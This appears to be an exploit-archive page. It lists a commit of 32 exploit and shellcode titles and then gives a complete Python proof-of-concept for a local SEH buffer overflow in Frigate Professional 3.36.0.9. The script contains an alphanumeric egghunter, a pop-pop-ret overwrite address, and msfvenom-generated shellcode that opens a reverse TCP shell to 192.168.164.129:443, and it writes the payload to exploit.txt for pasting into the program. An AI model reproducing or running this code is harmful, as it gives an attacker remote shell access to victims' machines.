e46d9f65ff
32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
98 lines
No EOL
5.2 KiB
Python
Executable file
98 lines
No EOL
5.2 KiB
Python
Executable file
# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
|
|
# Date: 2020-07-24
|
|
# Exploit Author: MasterVlad
|
|
# Vendor Homepage: http://www.frigate3.com/
|
|
# Software Link: http://www.frigate3.com/download/frigate3_pro.exe
|
|
# Version: 3.36.0.9
|
|
# Vulnerability Type: Local Buffer Overflow
|
|
# Tested on: Windows 7 32-bit
|
|
|
|
# Proof of Concept:
|
|
|
|
# 1. Run the python script
|
|
# 2. Open exploit.txt and copy the content to clipboard
|
|
# 3. Open Frigate3.exe and go to File -> Pack
|
|
# 4. Paste the clipboard into the "Archive To" field and click on Ok button
|
|
|
|
#!/usr/bin/python
|
|
|
|
egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c"
|
|
egg += "\x25\x4A\x50\x5c\x25\x4A"
|
|
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
|
|
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
|
|
|
|
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
|
|
buf = ""
|
|
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
|
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
|
|
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
|
|
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
|
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
|
|
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
|
|
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
|
|
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
|
|
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
|
|
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
|
|
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
|
|
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
|
|
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
|
|
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
|
|
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
|
|
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
|
|
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
|
|
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
|
|
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
|
|
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
|
|
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
|
|
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
|
|
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
|
|
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
|
|
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
|
|
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
|
|
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
|
|
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
|
|
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
|
|
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
|
|
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
|
|
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
|
|
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
|
|
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
|
|
buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
|
|
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
|
|
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
|
|
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
|
|
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
|
|
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
|
|
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
|
|
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
|
|
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
|
|
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
|
|
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
|
|
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
|
|
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
|
|
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
|
|
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
|
|
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
|
|
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
|
|
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
|
|
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
|
|
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
|
|
|
|
exploit = "A"*4112
|
|
# 0x40012623 - pop pop ret rtl60.bpl
|
|
exploit += "\x74\x06\x75\x04"
|
|
exploit += "\x23\x26\x01\x40"
|
|
exploit += egg
|
|
exploit += "C"*(5000-4120-len(egg))
|
|
exploit += "T00WT00W"
|
|
exploit += buf
|
|
|
|
f = open("exploit.txt", "w")
|
|
f.write(exploit)
|
|
f.close() |